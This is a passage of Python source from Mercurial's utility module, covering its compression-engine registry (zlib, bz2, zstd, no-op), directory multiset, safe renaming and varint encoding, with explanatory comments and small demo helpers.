                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
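
# A sketch of typical stderr output (the paths and line numbers are
# illustrative):
#
#   stacktrace at:
#    mercurial/dispatch.py:113 in run
#    mercurial/localrepo.py:2021 in commit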

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
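
# finddirs() walks ancestors from the deepest outward, which is what lets
# dirs.addpath()/delpath() stop at the first ancestor whose refcount
# already accounts for the rest of the chain. A sketch (the yielded values
# are byte strings under Python 3):
#
#   >>> list(finddirs(b'a/b/c'))
#   ['a/b', 'a']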

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))
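
    # A sketch of the resulting order with the engines registered later in
    # this module, assuming the optional zstd module is importable: zstd
    # (priority 50) sorts ahead of zlib (20), and the tied zero-priority
    # engines fall back to their alphabetical wire names.
    #
    #   >>> [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
    #   ['zstd', 'zlib', 'bz2', 'none']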

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
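
# A minimal sketch of a third-party engine an extension might register,
# assuming the standard library's lzma module; the engine itself and the
# names ('xz', 'XZ') are hypothetical, not part of Mercurial:
#
#   class _xzengine(compressionengine):
#       def name(self):
#           return 'xz'
#
#       def bundletype(self):
#           """Hypothetical xz/LZMA compression."""
#           return 'xz', 'XZ'
#
#       def compressstream(self, it, opts=None):
#           import lzma
#           z = lzma.LZMACompressor()
#           for chunk in it:
#               data = z.compress(chunk)
#               if data:
#                   yield data
#           yield z.flush()
#
#       def decompressorreader(self, fh):
#           import lzma
#           def gen():
#               d = lzma.LZMADecompressor()
#               for chunk in filechunkiter(fh):
#                   yield d.decompress(chunk)
#           return chunkbuffer(gen())
#
#   compengines.register(_xzengine())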

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
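
# Round-tripping a stream through the zlib engine, as a sketch (any
# iterable of byte chunks works; zlib is already imported above):
#
#   >>> eng = compengines['zlib']
#   >>> data = b''.join(eng.compressstream([b'hello '] * 1000))
#   >>> zlib.decompress(data) == b'hello ' * 1000
#   True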

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it makes decompression more efficient since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
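
# zstdrevlogcompressor.compress() encodes a storage policy rather than just
# a codec call: inputs under 50 bytes are never worth compressing, mid-sized
# inputs are compressed in one shot, large inputs are streamed in the
# module's recommended chunk size, and in every case compressed data is kept
# only when it is actually smaller than the input. A hedged stdlib sketch of
# the same policy, with zlib (already imported at the top of this module)
# standing in for zstd:
def _demostoragepolicy(data, smallthreshold=50):
    """Hypothetical demo: return compressed bytes, or None to store raw."""
    if len(data) < smallthreshold:
        return None  # too small for compression overhead to pay off
    compressed = zlib.compress(data)
    # Only report a win when the compressed form is strictly smaller.
    return compressed if len(compressed) < len(data) else None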

def bundlecompressiontopics():
    """Obtains a dict of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()
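
# The registry iteration pattern above (iterate names, index the registry,
# filter on available() and bundletype()) is the standard way to enumerate
# usable bundle specs. A small sketch of the same walk (the helper name is
# illustrative):
def _demolistbundletypes():
    """Hypothetical demo: bundle type names backed by available engines."""
    names = []
    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue
        bt = engine.bundletype()
        if bt and bt[0]:
            names.append(bt[0])
    return sorted(names)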

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
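
# Since safename() only needs ``in`` checks against ctx and others, any
# container works for a quick illustration; a set stands in for a real
# changectx in this hedged sketch (the helper name is illustrative):
def _demosafename():
    """Hypothetical demo of safename() collision handling."""
    taken = {'a.txt~orig', 'a.txt~orig~1'}
    # 'a.txt~orig' and 'a.txt~orig~1' exist, so the counter advances to 2.
    return safename('a.txt', 'orig', taken)  # -> 'a.txt~orig~2'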

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s
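
# The failure mode in miniature, assuming an in-memory stream (the helper
# name is illustrative):
def _demoreadexactly():
    """Hypothetical demo: readexactly() aborts on truncated input."""
    fh = io.BytesIO(b'abc')
    assert readexactly(fh, 2) == b'ab'  # enough bytes: returned verbatim
    try:
        readexactly(fh, 5)  # only one byte remains -> error.Abort
    except error.Abort:
        pass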

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's binary representation in groups of 7 bits,
    least significant group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
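
# Working the 1337 doctest by hand: 1337 is 0b10100111001. The low seven
# bits (0b0111001 = 0x39) are emitted first with the continuation bit set
# (0x39 | 0x80 = 0xb9); the remaining bits (1337 >> 7 = 10 = 0x0a) form the
# final byte with the high bit clear, giving '\xb9\n'. The same arithmetic
# as a sketch (the helper name is illustrative):
def _demouvarint1337():
    """Hypothetical demo re-deriving uvarintencode(1337) byte by byte."""
    low = (1337 & 0x7f) | 0x80  # 0xb9: low 7 bits plus continuation bit
    high = 1337 >> 7            # 0x0a: remaining bits, high bit stays clear
    return pycompat.bytechr(low) + pycompat.bytechr(high)  # == '\xb9\n'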

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
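
# A round-trip sketch tying the two halves together, assuming an in-memory
# stream (the helper name is illustrative):
def _demouvarintroundtrip(value=65536):
    """Hypothetical demo: decoding an encoded value recovers it exactly."""
    fh = io.BytesIO(uvarintencode(value))
    return uvarintdecodestream(fh) == value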

###
# Deprecation warnings for util.py splitting
###

def _deprecatedfunc(func, version):
    def wrapped(*args, **kwargs):
        fn = pycompat.sysbytes(func.__name__)
        mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
        msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
        nouideprecwarn(msg, version)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped
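
# The forwarding-wrapper pattern above in isolation: old call sites keep
# working, but each call points at the function's new home. A generic hedged
# sketch using the stdlib warnings module (already imported at the top of
# this module) in place of nouideprecwarn():
def _demodeprecated(func, newname):
    """Hypothetical demo of a deprecation-forwarding wrapper."""
    def wrapped(*args, **kwargs):
        warnings.warn('%s is deprecated, use %s' % (func.__name__, newname),
                      DeprecationWarning, stacklevel=2)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped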

defaultdateformats = dateutil.defaultdateformats
extendeddateformats = dateutil.extendeddateformats
makedate = _deprecatedfunc(dateutil.makedate, '4.6')
datestr = _deprecatedfunc(dateutil.datestr, '4.6')
shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')

escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
binary = _deprecatedfunc(stringutil.binary, '4.6')
stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
email = _deprecatedfunc(stringutil.email, '4.6')
ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
wrap = _deprecatedfunc(stringutil.wrap, '4.6')
parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')